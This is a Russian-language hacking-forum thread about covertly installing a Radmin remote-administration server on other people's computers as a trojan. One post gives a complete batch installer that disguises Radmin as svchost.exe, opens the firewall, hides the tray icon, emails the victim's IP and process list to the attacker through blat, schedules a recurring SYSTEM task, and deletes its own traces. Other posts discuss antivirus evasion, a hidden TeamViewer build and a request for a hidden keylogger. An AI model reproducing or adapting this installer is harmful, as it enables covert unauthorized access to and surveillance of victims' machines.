Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Статьи", создана пользователем Iindigo, 16 дек 2010.

1. zapadlo_zapadlov
    zapadlo_zapadlov Продвинутый
    Симпатии:
    4
    Может не в тему.
    Что можно дописать и вложить в уже установленный радмин чтоб не отсвечивалась
    иконка в панеле задач ???
    И чтоб ип приходил на почту.

Последнее редактирование: 8 фев 2011
    8 фев 2011
  2. raushenbarx
    raushenbarx Новичок
    Симпатии:
    0
    Есть проги, которые иконки в трее прячут- напр PS tray Factory- она и свой значёг тож ныкает. Или в реестре DisableTrayIcon=1 в ветке радминскаго сервака

8 фев 2011
  3. zapadlo_zapadlov
    Симпатии:
    4
    Я про уже установленный радмин на чужом компе.
    Надо прописать там что то чтоб после перезагрузки у него не вылазила иконка радмина и ип пришол мне на почту.
    А то что не найду компы у них динамические ип адресса :angry:

8 фев 2011
  4. onthar
    onthar Продвинутый
    Симпатии:
    224
    zapadlo_zapadlov,
    читайте топик полностью, найдете ответы на все вопросы.

8 фев 2011
  5. raushenbarx
    raushenbarx Новичок
    Симпатии:
    0
    Дык в этой сборке и так вроде иконка уже спрятана по дефолту :eek:

8 фев 2011
  6. Vitaliy89
    Vitaliy89 Новичок
    Симпатии:
    0
    Использовал inst.exe краха, всеравно не пашет, тестил на виртуалке. IP не приходит + не могу подключиться к серверу. Может ли быть ошибка из - за одинакового ip ? Или где еще порыться, чтобы устранить ошибку?

Добавлено через 3 минуты
    Может кто-нибудь, у кого трой работает исправно, кинуть уже готовый без отправки ip на мыло?

Последнее редактирование: 9 фев 2011
    9 фев 2011
  7. zapadlo_zapadlov
    Симпатии:
    4
    cmdow @ /HID

copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
    copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
    copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
    copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
    copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
    copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
    "%SYSTEMROOT%/svchost.exe" /start

%SYSTEMROOT%/system32/blat.exe -install -server smtp.rambler.ru -port 587 -f ИМЯ@rambler.ru -u ИМЯ -pw ПАРОЛЬ

ipconfig /all > %systemroot%/system32/ip.txt
    tasklist > %systemroot%/system32/task.txt

blat.exe %systemroot%/system32/ip.txt -to АДРЕС ПОЧТЫ КУДА ПРИЙДЕТ IP
    blat.exe %systemroot%/system32/task.txt -to АДРЕС ПОЧТЫ КУДА ПРИЙДЕТ IP

schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat

del cmdow.exe
    del blat.exe
    del blat.lib
    del blat.dll
    del raddrv.dll
    del admdll.dll
    del svchost.exe
    del install.bat
    У меня такой работает попробуй

9 фев 2011
  8. Vitaliy89
    Vitaliy89 Новичок
    Симпатии:
    0
    Не то, о чем я попросил + это inst.cmd только и на Remote Administrator если не ошибаюсь

9 фев 2011
  9. вася666
    вася666 Новичок
    Симпатии:
    0
    кину конечно,не вопрос..он пока что на сегоднишний момент палится ток 3.мя антивирями и то забугорными,так что кидай смело и собирать не геморно..работает на их- пишке просто красиво ,и файлы качаешь и стол видишь..тож есть свои минусы,например на 7 или висте после перезагрузки не попадаешь в закрытые папки, и не видишь рабочий стол( т.е действия жертвы) я с ентой фигулиной устал уже боротся,мне это только и надо ...кину тебе ссылку на форум ,там есть архив тима 5-го и как с ним работать (видео) а лучше давай я тебе его залью куда нить через асю или скайп( у меня видео по подробнее и с объяснениями) специально для меня писали его. моя аська 631554731 а скайп dimka2258 я помогу тебе с тимом ,а ты мне с радмином и внц, а то у меня с ним ничего не получается (( оки? http://hacker-school.ucoz.ru/load/3-1-0-19 ссылка на архив со скрытым тим вивером ,но могу и сам тебе его подогнать вместе с тем видосом.. сорри что не написал в личку,ты ее по моему не читаешь)) вообщем вместе разобратся попробуем с нашими геморами..я у ребят если что поспрашиваю

Добавлено через 2 минуты
    я тебе написал на последней странице

Добавлено через 4 минуты
    я тебе написал на последней странице

Добавлено через 26 минут
    крах,
    крах,давай свяжемся сейчас..очень нужно..заколебался уже с радмином ентим..забыл тебе сказать что отчеты ай-пи приходят с тима на твой хост ,так что если у тебя есть хост ,тебе и почта будет не нужна

Добавлено через 56 минут
    ребята..подскажите : где прячится в 7-ой винде данная сборка.. в папке темп я ее не нашел..как удалить ее с виртуалки? ..пасибки

Последнее редактирование: 10 фев 2011
    10 фев 2011
  10. крах
    крах Новичок
    Симпатии:
    14
    В скайп запрос отправил тебе,добавь

10 фев 2011
  11. вася666
    вася666 Новичок
    Симпатии:
    0
    дай еще раз запросик,скайп глюканул при добавлении

10 фев 2011
  12. onthar
    onthar Продвинутый
    Симпатии:
    224
    вася666,
    крах,
    свой милый чатик переводите в ЛС.

10 фев 2011
  13. вася666
    вася666 Новичок
    Симпатии:
    0
    харошо,прошу прощения ..у меня и в правду не получается ничего со сборкой, я запустил ее на виртуалке,но отчет не пришел, и никак вроди все установилось как надо(появилась папка его в (систем 32) ,но при попытке удалить пишет мол отказано или прога занята другим приложением.через унлокер тоже не удаляется(

10 фев 2011
  14. onthar
    onthar Продвинутый
    Симпатии:
    224
    это печально, очень. Очень печально то, что вы не можете в паре строк скрипта разобраться, и как бараны тут ноете. Тему закрываю, потому что это помойка несколько достала администрацию.

Предлагаю вычистить тему, все обсуждения вынести в раздел для новичков, первый пост подредактировать и оставить 100-процентный вариант сборки.

10 фев 2011
    1 человеку нравится это.
  15. вася666
    вася666 Новичок
    Симпатии:
    0
    в том то и дело что я сам себя уже запутал ,в вариантах и ошибках,не закрывай тему,только почисть ее пожалуйста.а разобратся я пробывал и сотню раз прочитал от корки и до корки.. и скрипты тоже изучил, ничего сложного вообщем -то,дело в том ,что я запутался в советах и исправдениях этих .с каждым скриптом пробывал,не приходит хоть лопни. уже наизусть делаю и вновь вчитываюсь в каждую буквочку.скорей всего я просто лузер у которого кривые руки( но буду пробывать

Добавлено через 1 минуту
    и никто не ноет ,а спрашивают,просто не могут объяснить правильно и грамотно причины (

Последнее редактирование: 10 фев 2011
    10 фев 2011
  16. raushenbarx
    raushenbarx Новичок
    Симпатии:
    0
    вася666,
    А ты попробуй не с виртуалки запустить, а из самой системы- как вариант- может получицо

10 фев 2011
  17. Leon93
    Leon93 Guest
    Кто может помочь и написать статейку как с помощью радмина закинуть скрытый кейлоггер или вообще не могу найти скрытый кейлоггер а то на данном сайте так и не нашёл! Пожалуйста помогите!

12 фев 2011
  18. onthar
    onthar Продвинутый
    Симпатии:
    224
    Ты тему создал - я там тебе ответил, не надо плодить одинаковые вопросы везде.
    Ты не искал, видимо, потому что у нас целый раздел с кейлоггерами, и поиск по форума с параметром "kelogger" приводит как раз в этот раздел: http://www.xaker.name/forvb/forumdisplay.php?f=184

12 фев 2011
  19. крах
    крах Новичок
    Симпатии:
    14
    Подскажи плиз...Созванивался с васей666 по скайпу собрали этот трой,с его почтой и.т.д Дело в том когда он запустил его я не смог к нему приконектиться (антивирус,фаервол,итд выкл.)А когда я запустил у себя он спакойно подключился ко мне...У меня оптика -вовлокно и у него тоже... В чем проблема ?У мя на почту отчеты приходят но к половине не могу подключится...

У него кстати все установилось нормально...

Последнее редактирование: 12 фев 2011
    12 фев 2011
  20. Vitaliy89
    Vitaliy89 Новичок
    Симпатии:
    0
    Тема скоро почистится и первый пост обновится?

13 фев 2011
Загрузка...